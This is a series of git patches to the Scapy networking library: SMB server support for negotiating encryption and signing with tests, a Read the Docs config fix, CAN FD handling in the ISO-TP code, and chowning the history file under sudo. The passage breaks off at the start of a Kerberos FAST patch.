--git a/scapy/layers/smbserver.py b/scapy/layers/smbserver.py index 17338fac3bd..8fba2238c51 100644 --- a/scapy/layers/smbserver.py +++ b/scapy/layers/smbserver.py @@ -76,17 +76,18 @@ FileStreamInformation, NETWORK_INTERFACE_INFO, SECURITY_DESCRIPTOR, + SMB2_CREATE_DURABLE_HANDLE_RESPONSE_V2, + SMB2_CREATE_QUERY_MAXIMAL_ACCESS_RESPONSE, + SMB2_CREATE_QUERY_ON_DISK_ID, SMB2_Cancel_Request, SMB2_Change_Notify_Request, SMB2_Change_Notify_Response, SMB2_Close_Request, SMB2_Close_Response, SMB2_Create_Context, - SMB2_CREATE_DURABLE_HANDLE_RESPONSE_V2, - SMB2_CREATE_QUERY_MAXIMAL_ACCESS_RESPONSE, - SMB2_CREATE_QUERY_ON_DISK_ID, SMB2_Create_Request, SMB2_Create_Response, + SMB2_ENCRYPTION_CIPHERS, SMB2_Echo_Request, SMB2_Echo_Response, SMB2_Encryption_Capabilities, @@ -94,8 +95,8 @@ SMB2_FILEID, SMB2_Header, SMB2_IOCTL_Network_Interface_Info, - SMB2_IOCTL_Request, SMB2_IOCTL_RESP_GET_DFS_Referral, + SMB2_IOCTL_Request, SMB2_IOCTL_Response, SMB2_IOCTL_Validate_Negotiate_Info_Response, SMB2_Negotiate_Context, @@ -108,6 +109,7 @@ SMB2_Query_Info_Response, SMB2_Read_Request, SMB2_Read_Response, + SMB2_SIGNING_ALGORITHMS, SMB2_Session_Logoff_Request, SMB2_Session_Logoff_Response, SMB2_Session_Setup_Request, @@ -155,9 +157,11 @@ class SMBShare: :param path: the path the the folder hosted by the share :param type: (optional) share type per [MS-SRVS] sect 2.2.2.4 :param remark: (optional) a description of the share + :param encryptdata: (optional) whether encryption should be used for this + share. This only applies to SMB 3.1.1. """ - def __init__(self, name, path=".", type=None, remark=""): + def __init__(self, name, path=".", type=None, remark="", encryptdata=False): # Set the default type if type is None: type = 0 # DISKTREE @@ -171,6 +175,7 @@ def __init__(self, name, path=".", type=None, remark=""): self.name = name self.type = type self.remark = remark + self.encryptdata = encryptdata def __repr__(self): type = SRVSVC_SHARE_TYPES[self.type & 0x0FFFFFFF] @@ -202,6 +207,8 @@ class SMB_Server(Automaton): :param ANONYMOUS_LOGIN: mark the clients as anonymous :param GUEST_LOGIN: mark the clients as guest :param REQUIRE_SIGNATURE: set 'Require Signature' + :param REQUIRE_ENCRYPTION: globally require encryption. + You could also make it share-specific on 3.1.1. :param MAX_DIALECT: maximum SMB dialect. Defaults to 0x0311 (3.1.1) :param TREE_SHARE_FLAGS: flags to announce on Tree_Connect_Response :param TREE_CAPABILITIES: capabilities to announce on Tree_Connect_Response @@ -223,7 +230,8 @@ def __init__(self, shares=[], ssp=None, verb=True, readonly=True, *args, **kwarg self.GUEST_LOGIN = kwargs.pop("GUEST_LOGIN", None) self.EXTENDED_SECURITY = kwargs.pop("EXTENDED_SECURITY", True) self.USE_SMB1 = kwargs.pop("USE_SMB1", False) - self.REQUIRE_SIGNATURE = kwargs.pop("REQUIRE_SIGNATURE", False) + self.REQUIRE_SIGNATURE = kwargs.pop("REQUIRE_SIGNATURE", None) + self.REQUIRE_ENCRYPTION = kwargs.pop("REQUIRE_ENCRYPTION", False) self.MAX_DIALECT = kwargs.pop("MAX_DIALECT", 0x0311) self.TREE_SHARE_FLAGS = kwargs.pop( "TREE_SHARE_FLAGS", "FORCE_LEVELII_OPLOCK+RESTRICT_EXCLUSIVE_OPENS" @@ -294,6 +302,8 @@ def __init__(self, shares=[], ssp=None, verb=True, readonly=True, *args, **kwarg self.SMB2 = False self.NegotiateCapabilities = None self.GUID = RandUUID()._fix() + self.NextForceSign = False + self.NextForceEncrypt = False # Compounds are handled on receiving by the StreamSocket, # and on aggregated in a CompoundQueue to be sent in one go self.NextCompound = False @@ -315,9 +325,8 @@ def __init__(self, shares=[], ssp=None, verb=True, readonly=True, *args, **kwarg Automaton.__init__(self, *args, **kwargs) # Set session options self.session.ssp = ssp - self.session.SecurityMode = kwargs.pop( - "SECURITY_MODE", - 3 if self.REQUIRE_SIGNATURE else bool(ssp), + self.session.SigningRequired = ( + self.REQUIRE_SIGNATURE if self.REQUIRE_SIGNATURE is not None else bool(ssp) ) @property @@ -336,7 +345,14 @@ def vprint(self, s=""): print("> %s" % s) def send(self, pkt): - return super(SMB_Server, self).send(pkt, Compounded=self.NextCompound) + ForceSign, ForceEncrypt = self.NextForceSign, self.NextForceEncrypt + self.NextForceSign = self.NextForceEncrypt = False + return super(SMB_Server, self).send( + pkt, + Compounded=self.NextCompound, + ForceSign=ForceSign, + ForceEncrypt=ForceEncrypt, + ) @ATMT.state(initial=1) def BEGIN(self): @@ -433,6 +449,9 @@ def on_negotiate(self, pkt): self.send(resp) return if self.SMB2: # SMB2 + # SecurityMode + if SMB2_Header in pkt and pkt.SecurityMode.SIGNING_REQUIRED: + self.session.SigningRequired = True # Capabilities: [MS-SMB2] 3.3.5.4 self.NegotiateCapabilities = "+".join( [ @@ -449,16 +468,17 @@ def on_negotiate(self, pkt): "MULTI_CHANNEL", "PERSISTENT_HANDLES", "DIRECTORY_LEASING", + "ENCRYPTION", ] ) - if DialectRevision in [0x0300, 0x0302]: - # "if Connection.Dialect is "3.0" or "3.0.2""... - # Note: 3.1.1 uses the ENCRYPT_DATA flag in Tree Connect Response - self.NegotiateCapabilities += "+ENCRYPTION" # Build response resp = self.smb_header.copy() / cls( DialectRevision=DialectRevision, - SecurityMode=self.session.SecurityMode, + SecurityMode=( + "SIGNING_ENABLED+SIGNING_REQUIRED" + if self.session.SigningRequired + else "SIGNING_ENABLED" + ), ServerTime=(time.time() + 11644473600) * 1e7, ServerStartTime=0, MaxTransactionSize=65536, @@ -473,7 +493,27 @@ def on_negotiate(self, pkt): resp.MaxReadSize = 0x800000 resp.MaxWriteSize = 0x800000 # SMB 3.1.1 - if DialectRevision >= 0x0311: + if DialectRevision >= 0x0311 and pkt.NegotiateContextsCount: + # Negotiate context-capabilities + for ngctx in pkt.NegotiateContexts: + if ngctx.ContextType == 0x0002: + # SMB2_ENCRYPTION_CAPABILITIES + for ciph in ngctx.Ciphers: + tciph = SMB2_ENCRYPTION_CIPHERS.get(ciph, None) + if tciph in self.session.SupportedCipherIds: + # Common ! + self.session.CipherId = tciph + self.session.SupportsEncryption = True + break + elif ngctx.ContextType == 0x0008: + # SMB2_SIGNING_CAPABILITIES + for signalg in ngctx.SigningAlgorithms: + tsignalg = SMB2_SIGNING_ALGORITHMS.get(signalg, None) + if tsignalg in self.session.SupportedSigningAlgorithmIds: + # Common ! + self.session.SigningAlgorithmId = tsignalg + break + # Send back the negotiated algorithms resp.NegotiateContexts = [ # Preauth capabilities SMB2_Negotiate_Context() @@ -504,7 +544,11 @@ def on_negotiate(self, pkt): "LEVEL_II_OPLOCKS+LOCK_AND_READ+NT_FIND+" "LWIO+INFOLEVEL_PASSTHRU+LARGE_READX+LARGE_WRITEX" ), - SecurityMode=self.session.SecurityMode, + SecurityMode=( + "SIGNING_ENABLED+SIGNING_REQUIRED" + if self.session.SigningRequired + else "SIGNING_ENABLED" + ), ServerTime=(time.time() + 11644473600) * 1e7, ServerTimeZone=0x3C, ) @@ -534,6 +578,11 @@ def on_negotiate(self, pkt): ) self.send(resp) + @ATMT.state(final=1) + def NEGO_FAILED(self): + self.vprint("SMB Negotiate failed: encryption was not negotiated.") + self.end() + @ATMT.state() def NEGOTIATED(self): pass @@ -550,6 +599,17 @@ def update_smbheader(self, pkt): self.smb_header.CreditCharge = pkt.CreditCharge # If the packet has a NextCommand, set NextCompound to True self.NextCompound = bool(pkt.NextCommand) + # [MS-SMB2] sect 3.3.4.1.1 - "If the request was signed by the client..." + # If the packet was signed, note we must answer with a signed packet. + if ( + not self.session.SigningRequired + and pkt.SecuritySignature != b"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0" + ): + self.NextForceSign = True + # [MS-SMB2] sect 3.3.4.1.4 - "If the message being sent is any response to a + # client request for which Request.IsEncrypted is TRUE" + if pkt[SMB2_Header]._decrypted: + self.NextForceEncrypt = True # [MS-SMB2] sect 3.3.5.2.7.2 # Add SMB2_FLAGS_RELATED_OPERATIONS to the response if present if pkt.Flags.SMB2_FLAGS_RELATED_OPERATIONS: @@ -632,12 +692,19 @@ def on_setup_andx_request(self, pkt, ssp_blob): ): # SMB1 extended / SMB2 if SMB2_Session_Setup_Request in pkt: - # SMB2 resp = self.smb_header.copy() / SMB2_Session_Setup_Response() if self.GUEST_LOGIN: + # "If the security subsystem indicates that the session + # was established by a guest user, Session.SigningRequired + # MUST be set to FALSE and Session.IsGuest MUST be set to TRUE." resp.SessionFlags = "IS_GUEST" + self.session.IsGuest = True + self.session.SigningRequired = False if self.ANONYMOUS_LOGIN: resp.SessionFlags = "IS_NULL" + # [MS-SMB2] sect 3.3.5.5.3 + if self.session.Dialect >= 0x0300 and self.REQUIRE_ENCRYPTION: + resp.SessionFlags += "ENCRYPT_DATA" else: # SMB1 extended resp = ( @@ -672,10 +739,23 @@ def on_setup_andx_request(self, pkt, ssp_blob): ) if status == GSS_S_COMPLETE: # Authentication was successful - self.session.computeSMBSessionKey() + self.session.computeSMBSessionKeys(IsClient=False) self.authenticated = True - # and send + # [MS-SMB2] Note: "Windows-based servers always sign the final session setup + # response when the user is neither anonymous nor guest." + # If not available, it will still be ignored. + self.NextForceSign = True self.send(resp) + # Check whether we must enable encryption from now on + if ( + self.authenticated + and not self.session.IsGuest + and self.session.Dialect >= 0x0300 + and self.REQUIRE_ENCRYPTION + ): + # [MS-SMB2] sect 3.3.5.5.3: from now on, turn encryption on ! + self.session.EncryptData = True + self.session.SigningRequired = False @ATMT.condition(RECEIVED_SETUP_ANDX_REQUEST) def wait_for_next_request(self): @@ -771,7 +851,9 @@ def receive_tree_connect(self, pkt): def send_tree_connect_response(self, pkt, tree_name): self.update_smbheader(pkt) # Check the tree name against the shares we're serving - if not any(x._name == tree_name.lower() for x in self.shares): + try: + share = next(x for x in self.shares if x._name == tree_name.lower()) + except StopIteration: # Unknown tree resp = self.smb_header.copy() / SMB2_Error_Response() resp.Command = "SMB2_TREE_CONNECT" @@ -783,17 +865,32 @@ def send_tree_connect_response(self, pkt, tree_name): self.tree_id += 1 self.smb_header.TID = self.tree_id self.current_trees[self.smb_header.TID] = tree_name + + # Construct ShareFlags + ShareFlags = ( + "AUTO_CACHING+NO_CACHING" + if self.current_tree() == "IPC$" + else self.TREE_SHARE_FLAGS + ) + # [MS-SMB2] sect 3.3.5.7 + if ( + self.session.Dialect >= 0x0311 + and not self.session.EncryptData + and share.encryptdata + ): + if not self.session.SupportsEncryption: + raise Exception("Peer asked for encryption but doesn't support it !") + ShareFlags += "+ENCRYPT_DATA" + self.vprint("Tree Connect on: %s" % tree_name) self.send( - self.smb_header + self.smb_header.copy() / SMB2_Tree_Connect_Response( ShareType="PIPE" if self.current_tree() == "IPC$" else "DISK", - ShareFlags="AUTO_CACHING+NO_CACHING" - if self.current_tree() == "IPC$" - else self.TREE_SHARE_FLAGS, - Capabilities=0 - if self.current_tree() == "IPC$" - else self.TREE_CAPABILITIES, + ShareFlags=ShareFlags, + Capabilities=( + 0 if self.current_tree() == "IPC$" else self.TREE_CAPABILITIES + ), MaximalAccess=self.TREE_MAXIMAL_ACCESS, ) ) @@ -848,7 +945,11 @@ def send_ioctl_response(self, pkt): SMB2_IOCTL_Validate_Negotiate_Info_Response( GUID=self.GUID, DialectRevision=self.session.Dialect, - SecurityMode=self.session.SecurityMode, + SecurityMode=( + "SIGNING_ENABLED+SIGNING_REQUIRED" + if self.session.SigningRequired + else "SIGNING_ENABLED" + ), Capabilities=self.NegotiateCapabilities, ), ) diff --git a/test/scapy/layers/smb2.uts b/test/scapy/layers/smb2.uts index 7bd4969e206..5ecb92a9904 100644 --- a/test/scapy/layers/smb2.uts +++ b/test/scapy/layers/smb2.uts @@ -308,8 +308,7 @@ enc_context = SMB2_Negotiate_Context(ContextType = 2, DataLength = len(enc)) / e comp = SMB2_Compression_Capabilities() comp_context = SMB2_Negotiate_Context(ContextType = 3, DataLength = len(comp)) / comp -netname = SMB2_Netname_Negotiate_Context_ID("192.168.178.21".encode("utf-16le")) -netname_context = SMB2_Negotiate_Context(ContextType = 5, DataLength = len(netname)) / netname +netname_context = SMB2_Negotiate_Context(b'\x05\x00\x1c\x00\x00\x00\x00\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x007\x008\x00.\x002\x001\x00') pkt = SMB2_Header() / SMB2_Negotiate_Protocol_Request(Dialects=[0x0311], NegotiateContexts=[preauth_context, enc_context, comp_context, netname_context], NegotiateContextsBufferOffset=0x68) diff --git a/test/scapy/layers/smbclientserver.uts b/test/scapy/layers/smbclientserver.uts index 6279735d8eb..101843cbdc6 100644 --- a/test/scapy/layers/smbclientserver.uts +++ b/test/scapy/layers/smbclientserver.uts @@ -259,28 +259,31 @@ with (ROOTPATH / "fileScapy").open("w") as fd: fd.write("Nice\nData") class run_smbserver: - def __init__(self, guest=False, readonly=True): + def __init__(self, guest=False, readonly=True, encryptshare=False, MAX_DIALECT=0x311): self.srv = None self.guest = guest self.readonly = readonly + self.encryptshare = encryptshare + self.MAX_DIALECT = MAX_DIALECT def __enter__(self): if self.guest: - IDENTITIES = None + ssp = None else: - IDENTITIES = { + ssp = SPNEGOSSP([NTLMSSP(IDENTITIES={ "User1": MD4le("Password1"), "Administrator": MD4le("Password2") - } + })]) self.srv = smbserver( - shares=[SMBShare("Scapy", ROOTPATH), SMBShare("test", ROOTPATH)], + shares=[SMBShare("Scapy", ROOTPATH, encryptdata=self.encryptshare), + SMBShare("test", ROOTPATH, encryptdata=self.encryptshare)], iface=conf.loopback_name, debug=4, port=12345, bg=True, readonly=self.readonly, - # NTLMSSP - IDENTITIES=IDENTITIES, + MAX_DIALECT=self.MAX_DIALECT, + ssp=ssp, ) def __exit__(self, exc_type, exc_value, traceback): @@ -290,7 +293,7 @@ class run_smbserver: # define client class run_smbclient: - def __init__(self, user=None, password=None, share=None, list=False, cwd=None, debug=None, maxversion=None): + def __init__(self, user=None, password=None, share=None, list=False, cwd=None, debug=None, maxversion=None, encrypt=False): args = [ "smbclient", ] + (["-L"] if list else []) + [ @@ -308,6 +311,8 @@ class run_smbclient: args.append("-N") if maxversion: args.extend(["-m", maxversion]) + if encrypt: + args.extend(["--client-protection", "encrypt"]) self.args = args self.proc = subprocess.Popen( args, @@ -427,3 +432,51 @@ with run_smbserver(readonly=False): raise finally: cli.close() + += smbserver: SMB 3.0.2 - require global encryption + +LOCALPATH = pathlib.Path(get_temp_dir()) + +nicedata = ("A" * 100 + "\n") * 5 +with open(LOCALPATH / "newCustomFile", "w") as fd: + fd.write(nicedata) + +with run_smbserver(readonly=False, MAX_DIALECT=0x0302): + try: + cli = run_smbclient(user="Administrator", password="Password2", share="test", cwd=LOCALPATH, encrypt=True) + cli.cmd("put newCustomFile") + output = cli.getoutput() + print(output) + assert "putting file newCustomFile" in output[0], "strange output" + assert (ROOTPATH / "newCustomFile").exists(), "file doesn't exist" + with (ROOTPATH / "newCustomFile").open("r") as fd: + assert fd.read() == nicedata, "invalid data" + except Exception: + cli.printdebug() + raise + finally: + cli.close() + += smbserver: SMB 3.1.1 - require share encryption + +LOCALPATH = pathlib.Path(get_temp_dir()) + +nicedata = ("A" * 100 + "\n") * 5 +with open(LOCALPATH / "newCustomFile", "w") as fd: + fd.write(nicedata) + +with run_smbserver(readonly=False, encryptshare=True): + try: + cli = run_smbclient(user="Administrator", password="Password2", share="test", cwd=LOCALPATH) + cli.cmd("put newCustomFile") + output = cli.getoutput() + print(output) + assert "putting file newCustomFile" in output[0], "strange output" + assert (ROOTPATH / "newCustomFile").exists(), "file doesn't exist" + with (ROOTPATH / "newCustomFile").open("r") as fd: + assert fd.read() == nicedata, "invalid data" + except Exception: + cli.printdebug() + raise + finally: + cli.close() From 6cfa84dbee091a9544e60729484e0732d47a329b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 3 Feb 2025 23:09:43 +0100 Subject: [PATCH 1427/1632] Add new required sphinx.configuration (#4654) --- .readthedocs.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.readthedocs.yml b/.readthedocs.yml index 8084a8d4a7f..32cffc8be28 100644 --- a/.readthedocs.yml +++ b/.readthedocs.yml @@ -4,6 +4,9 @@ version: 2 +sphinx: + - configuration: doc/scapy/conf.py + formats: - epub - pdf From 3e00f425542d30bee275e4db839c1c6f80424baa Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 3 Feb 2025 23:11:29 +0100 Subject: [PATCH 1428/1632] Fix typo in RTFD config --- .readthedocs.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.readthedocs.yml b/.readthedocs.yml index 32cffc8be28..b4732b29e04 100644 --- a/.readthedocs.yml +++ b/.readthedocs.yml @@ -5,7 +5,7 @@ version: 2 sphinx: - - configuration: doc/scapy/conf.py + configuration: doc/scapy/conf.py formats: - epub From d2c6055429f48d1c9646e9250b38606cbce4e7ac Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 4 Feb 2025 12:44:28 +0100 Subject: [PATCH 1429/1632] Fix #4635: Enhance ISO-TP Soft Socket Implementation (#4636) --- scapy/contrib/isotp/isotp_packet.py | 42 +++++++++++----------- scapy/contrib/isotp/isotp_soft_socket.py | 44 +++++++++++++----------- test/contrib/isotp_soft_socket.uts | 23 +++++++++---- 3 files changed, 61 insertions(+), 48 deletions(-) diff --git a/scapy/contrib/isotp/isotp_packet.py b/scapy/contrib/isotp/isotp_packet.py index 6f62614ca2b..3da14956dda 100644 --- a/scapy/contrib/isotp/isotp_packet.py +++ b/scapy/contrib/isotp/isotp_packet.py @@ -6,19 +6,8 @@ # scapy.contrib.description = ISO-TP (ISO 15765-2) Packet Definitions # scapy.contrib.status = library -import struct import logging - -from scapy.config import conf -from scapy.packet import Packet -from scapy.fields import BitField, FlagsField, StrLenField, \ - ThreeBytesField, XBitField, ConditionalField, \ - BitEnumField, ByteField, XByteField, BitFieldLenField, StrField, \ - FieldLenField, IntField, ShortField -from scapy.compat import chb, orb -from scapy.layers.can import CAN, CAN_FD_MAX_DLEN as CAN_FD_MAX_DLEN -from scapy.error import Scapy_Exception - +import struct # Typing imports from typing import ( Optional, @@ -29,6 +18,16 @@ cast, ) +from scapy.compat import chb, orb +from scapy.config import conf +from scapy.error import Scapy_Exception +from scapy.fields import BitField, FlagsField, StrLenField, \ + ThreeBytesField, XBitField, ConditionalField, \ + BitEnumField, ByteField, XByteField, BitFieldLenField, StrField, \ + FieldLenField, IntField, ShortField +from scapy.layers.can import CAN, CAN_FD_MAX_DLEN as CAN_FD_MAX_DLEN, CANFD +from scapy.packet import Packet + log_isotp = logging.getLogger("scapy.contrib.isotp") CAN_MAX_IDENTIFIER = (1 << 29) - 1 # Maximum 29-bit identifier @@ -103,6 +102,7 @@ def fragment(self, *args, **kargs): """ fd = kargs.pop("fd", False) + pkt_cls = CANFD if fd else CAN def _get_data_len(): # type: () -> int @@ -122,10 +122,10 @@ def _get_data_len(): frame_data = struct.pack('B', self.rx_ext_address) + frame_data if self.rx_id is None or self.rx_id <= 0x7ff: - pkt = CAN(identifier=self.rx_id, data=frame_data) + pkt = pkt_cls(identifier=self.rx_id, data=frame_data) else: - pkt = CAN(identifier=self.rx_id, flags="extended", - data=frame_data) + pkt = pkt_cls(identifier=self.rx_id, flags="extended", + data=frame_data) return [pkt] # Construct the first frame @@ -138,10 +138,10 @@ def _get_data_len(): idx = _get_data_len() - len(frame_header) frame_data = self.data[0:idx] if self.rx_id is None or self.rx_id <= 0x7ff: - frame = CAN(identifier=self.rx_id, data=frame_header + frame_data) + frame = pkt_cls(identifier=self.rx_id, data=frame_header + frame_data) else: - frame = CAN(identifier=self.rx_id, flags="extended", - data=frame_header + frame_data) + frame = pkt_cls(identifier=self.rx_id, flags="extended", + data=frame_header + frame_data) # Construct consecutive frames n = 1 @@ -156,10 +156,10 @@ def _get_data_len(): if self.rx_ext_address: frame_header = struct.pack('B', self.rx_ext_address) + frame_header # noqa: E501 if self.rx_id is None or self.rx_id <= 0x7ff: - pkt = CAN(identifier=self.rx_id, data=frame_header + frame_data) # noqa: E501 + pkt = pkt_cls(identifier=self.rx_id, data=frame_header + frame_data) # noqa: E501 else: - pkt = CAN(identifier=self.rx_id, flags="extended", - data=frame_header + frame_data) + pkt = pkt_cls(identifier=self.rx_id, flags="extended", + data=frame_header + frame_data) pkts.append(pkt) return cast(List[Packet], pkts) diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index 81c6d3fe874..4182d445336 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -4,29 +4,16 @@ # Copyright (C) Nils Weiss # Copyright (C) Enrico Pozzobon +import heapq # scapy.contrib.description = ISO-TP (ISO 15765-2) Soft Socket Library # scapy.contrib.status = library import logging +import socket import struct import time import traceback -import heapq -import socket - -from threading import Thread, Event, RLock from bisect import bisect_left - -from scapy.packet import Packet -from scapy.layers.can import CAN -from scapy.error import Scapy_Exception -from scapy.supersocket import SuperSocket -from scapy.config import conf -from scapy.consts import LINUX -from scapy.utils import EDecimal -from scapy.automaton import ObjectPipe, select_objects -from scapy.contrib.isotp.isotp_packet import ISOTP, CAN_MAX_DLEN, N_PCI_SF, \ - N_PCI_CF, N_PCI_FC, N_PCI_FF, ISOTP_MAX_DLEN, ISOTP_MAX_DLEN_2015, CAN_FD_MAX_DLEN - +from threading import Thread, Event, RLock # Typing imports from typing import ( Optional, @@ -40,6 +27,17 @@ TYPE_CHECKING, ) +from scapy.automaton import ObjectPipe, select_objects +from scapy.config import conf +from scapy.consts import LINUX +from scapy.contrib.isotp.isotp_packet import ISOTP, CAN_MAX_DLEN, N_PCI_SF, \ + N_PCI_CF, N_PCI_FC, N_PCI_FF, ISOTP_MAX_DLEN, ISOTP_MAX_DLEN_2015, CAN_FD_MAX_DLEN +from scapy.error import Scapy_Exception +from scapy.layers.can import CAN, CANFD +from scapy.packet import Packet +from scapy.supersocket import SuperSocket +from scapy.utils import EDecimal + if TYPE_CHECKING: from scapy.contrib.cansocket import CANSocket @@ -209,8 +207,10 @@ def select(sockets, remain=None): """This function is called during sendrecv() routine to wait for sockets to be ready to receive """ - obj_pipes = [x.impl.rx_queue for x in sockets if - isinstance(x, ISOTPSoftSocket) and not x.closed] + obj_pipes: List[Union[SuperSocket, ObjectPipe[Tuple[bytes, Union[float, EDecimal]]]]] = [ # noqa: E501 + x.impl.rx_queue for x in sockets if + isinstance(x, ISOTPSoftSocket) and not x.closed] + obj_pipes += [x for x in sockets if isinstance(x, ObjectPipe) and not x.closed] ready_pipes = select_objects(obj_pipes, remain) @@ -579,13 +579,15 @@ def _get_padding_size(pl_size): return fd_accepted_sizes[-1] return fd_accepted_sizes[pos] + pkt_cls = CANFD if self.fd else CAN + if self.padding: load += b"\xCC" * (_get_padding_size(len(load)) - len(load)) if self.tx_id is None or self.tx_id <= 0x7ff: - self.can_socket.send(CAN(identifier=self.tx_id, data=load)) + self.can_socket.send(pkt_cls(identifier=self.tx_id, data=load)) else: - self.can_socket.send(CAN(identifier=self.tx_id, flags="extended", - data=load)) + self.can_socket.send(pkt_cls(identifier=self.tx_id, flags="extended", + data=load)) def can_recv(self): # type: () -> None diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index ece7ef5f621..2e7bdfaeccf 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -138,7 +138,7 @@ with TestSocket(CANFD) as cans, TestSocket(CANFD) as stim, ISOTPSoftSocket(cans, s.failure_analysis() raise Scapy_Exception("ERROR") msg = pkts[0] - assert msg.data == dhex(data_str) + assert dhex(data_str) in msg.data = Two frame receive @@ -235,7 +235,8 @@ def testfd(): cfs = stim.sniff(timeout=20, count=len(fragments) - 1, started_callback=lambda: stim.send(ack)) for fragment, cf in zip(fragments, ff + cfs): - assert (bytes(fragment) == bytes(cf)) + print(bytes(fragment), bytes(cf)) + assert (bytes(fragment) in bytes(cf)) testfd() @@ -370,7 +371,7 @@ with TestSocket(CANFD) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x2 assert can[0].data == dhex("10 {} {}".format("%02X" % size_to_send, " ".join(["%02X" % x for x in range(max_pl_size)]))) can = cans.sniff(timeout=1, count=1, started_callback=lambda: cans.send(CANFD(identifier = 0x241, data=dhex("30 00 00")))) assert can[0].identifier == 0x641 - assert can[0].data == dhex("21 {}".format(" ".join(["%02X" % x for x in range(max_pl_size, size_to_send)]))) + assert dhex("21 {}".format(" ".join(["%02X" % x for x in range(max_pl_size, size_to_send)]))) in can[0].data = Send single frame ISOTP message with TestSocket(CAN) as cans, TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x241) as s: @@ -468,7 +469,7 @@ with TestSocket(CANFD) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x2 raise Scapy_Exception("ERROR") can = pkts[0] assert can.identifier == 0x641 - assert can.data == dhex("21 {}".format(" ".join(["%02X" % x for x in range(max_pl_size, size_to_send)]))) + assert dhex("21 {}".format(" ".join(["%02X" % x for x in range(max_pl_size, size_to_send)]))) in can.data thread.join(15) acks.close() @@ -557,7 +558,7 @@ with TestSocket(CANFD) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x2 raise Scapy_Exception("ERROR") can = pkts[0] assert can.identifier == 0x641 - assert can.data == dhex("21 {}".format(" ".join(["%02X" % x for x in range(max_pl_size, size_to_send)]))) + assert dhex("21 {}".format(" ".join(["%02X" % x for x in range(max_pl_size, size_to_send)]))) in can.data thread.join(15) acks.close() @@ -644,7 +645,7 @@ with TestSocket(CANFD) as isocan, ISOTPSoftSocket(isocan, tx_id=0x641, rx_id=0x2 raise Scapy_Exception("ERROR") can = pkts[0] assert can.identifier == 0x641 - assert can.data == dhex("21 {}".format(" ".join(["%02X" % x for x in range(max_pl_size, size_to_send)]))) + assert dhex("21 {}".format(" ".join(["%02X" % x for x in range(max_pl_size, size_to_send)]))) in can.data thread.join(15) acks.close() @@ -943,6 +944,16 @@ assert rx == msg assert rx2 is not None assert rx2 == msg += ISOTPSoftSocket sr1 timeout +msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') + +with TestSocket(CAN) as isocan_tx, ISOTPSoftSocket(isocan_tx, 0x123, 0x321) as sock_tx, \ + TestSocket(CAN) as isocan_rx, ISOTPSoftSocket(isocan_rx, 0x321, 0x123) as sock_rx: + isocan_rx.pair(isocan_tx) + rx2 = sock_tx.sr1(msg, timeout=1, verbose=True) + +assert rx2 is None + = ISOTPSoftSocket sniff msg = ISOTP(b'\x11\x22\x33\x11\x22\x33\x11\x22\x33\x11\x22\x33') From 2f3f5dd56bb114b96ce51ce71e2f4ab059b69a42 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 5 Feb 2025 12:46:10 +0100 Subject: [PATCH 1430/1632] Chown the history file (#4656) * Chown the history file * Fix --- scapy/main.py | 60 +++++++++++++++++++++++++++------------------------ 1 file changed, 32 insertions(+), 28 deletions(-) diff --git a/scapy/main.py b/scapy/main.py index 414bd46c1a2..23ffe8db35b 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -101,6 +101,26 @@ def _probe_cache_folder(*cf): ) +def _check_perms(file: Union[pathlib.Path, str]) -> None: + """ + Checks that the permissions of a file are properly user-specific, if sudo is used. + """ + if ( + not WINDOWS and + "SUDO_UID" in os.environ and + "SUDO_GID" in os.environ + ): + # Was started with sudo. Still, chown to the user. + try: + os.chown( + file, + int(os.environ["SUDO_UID"]), + int(os.environ["SUDO_GID"]), + ) + except Exception: + pass + + def _read_config_file(cf, _globals=globals(), _locals=locals(), interactive=True, default=None): # type: (str, Dict[str, Any], Dict[str, Any], bool, Optional[str]) -> None @@ -137,36 +157,12 @@ def _read_config_file(cf, _globals=globals(), _locals=locals(), try: if not cf_path.parent.exists(): cf_path.parent.mkdir(parents=True, exist_ok=True) - if ( - not WINDOWS and - "SUDO_UID" in os.environ and - "SUDO_GID" in os.environ - ): - # Was started with sudo. Still, chown to the user. - try: - os.chown( - cf_path.parent, - int(os.environ["SUDO_UID"]), - int(os.environ["SUDO_GID"]), - ) - except Exception: - pass + _check_perms(cf_path.parent) + with cf_path.open("w") as fd: fd.write(default) - if ( - not WINDOWS and - "SUDO_UID" in os.environ and - "SUDO_GID" in os.environ - ): - # Was started with sudo. Still, chown to the user. - try: - os.chown( - cf_path, - int(os.environ["SUDO_UID"]), - int(os.environ["SUDO_GID"]), - ) - except Exception: - pass + + _check_perms(cf_path) log_loading.debug("Config file [%s] created with default.", cf) except OSError: log_loading.warning("Config file [%s] could not be created.", cf, @@ -816,6 +812,14 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): banner_text += "\n" banner_text += mybanner + # Make sure the history file has proper permissions + try: + if not pathlib.Path(conf.histfile).exists(): + pathlib.Path(conf.histfile).touch() + _check_perms(conf.histfile) + except OSError: + pass + # Configure interactive terminal if conf.interactive_shell not in [ From c15a670926185f6ddb9b3330ed1f947ff6f14b92 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 6 Feb 2025 22:22:38 +0100 Subject: [PATCH 1431/1632] Kerberos: support FAST (#4658) --- scapy/layers/kerberos.py | 538 